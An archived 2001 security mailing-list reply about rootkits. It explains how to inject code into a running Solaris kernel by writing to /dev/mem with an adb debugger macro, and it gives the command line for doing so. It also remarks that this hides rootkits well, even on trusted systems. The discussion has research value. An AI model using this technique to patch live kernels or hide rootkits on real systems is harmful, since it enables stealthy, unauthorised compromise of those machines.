Vulnerability Development mailing list archives
Re: Positive uses for rootkits
From: Gregor Binder <gbinder () sysfive com>
Date: Thu, 29 Mar 2001 10:53:55 +0200
Ryan Permeh on Wed, Mar 28, 2001 at 09:31:28AM -0800: Ryan,
there are kernel debuggers that use /dev/kmem. using this same methodology, you could create a inmemory kernel patcher that could inject rootkit code into a running kernel.
absolutely, and you don't even have to have much more than a debugger macro, no need for a patching tool. (On systems that have such a debug- ger) Think about this: echo "$<your_leet_adb_macro" | adb -I /tmp -w -k /dev/ksyms /dev/mem where /tmp/your_leet_adb_macro merely needs to contain positioning code, and the instructions you want to place at whatever location you decided to patch, all written as adb commands. Since you have symbols available, it shouldn't be too hard to find the call you want to mess with ... getting the assembly instructions right will be a lot harder, as well as staying inside the function, not freezing/panicing your box during development (well, just boot in kadb and undo your changes if that happens and deal with it ;)) The concept above is the Solaris way to do it, while it would still work on many SVR4 style UNIXes. On BSDs, you might get there with kdb or ddb, on Linux you'd probably have to use somehthing homegrown targetted for this particular use, since no one will build the SGI kernel debugger into their system just for you to penetrate it :) I think it would be *a lot* easier to hide a rootkit like this, and one of the few techniques that will get you good results even on trusted boxes (given you can get to /dev/mem somehow). Regards, -- Gregor Binder <gregor.binder () sysfive com> http://sysfive.com/ sysfive.com GmbH UNIX. Networking. Security. Applications. PGP id: 0x20C6DA55 fp: 18AB 2DD0 F8FA D710 1EDC A97A B128 01C0 20C6 DA55
Current thread:
- Re: Positive uses for rootkits, (continued)
- Re: Positive uses for rootkits Ben Ford (Mar 28)
- Re: Positive uses for rootkits Big Woz (Mar 28)
- Re: Positive uses for rootkits Renee Teunissen (Mar 26)
- Re: Positive uses for rootkits Dick Visser (Mar 26)
- The use of immunix Renee Teunissen (Mar 26)
- Re: Positive uses for rootkits Ben Ford (Mar 27)
- Re: Positive uses for rootkits Martin 'Goran' Moravec (Mar 28)
- Re: Positive uses for rootkits Kev (Mar 28)
- Re: Positive uses for rootkits Ryan Permeh (Mar 29)
- Kernel-level security (was Re: Positive uses for rootkits) Craig Boston (Mar 29)
- Re: Positive uses for rootkits Gregor Binder (Mar 29)
- ICQ exploit Geo. (Mar 28)
- Re: ICQ exploit Jonathan James (Mar 28)
- Re: ICQ exploit Mikko Ruskola (Mar 28)
- Re: ICQ exploit Knud Erik Højgaard - CyberCity Support (Mar 28)
- Re: ICQ exploit John (Mar 28)
- Re: ICQ exploit Blake Frantz (Mar 28)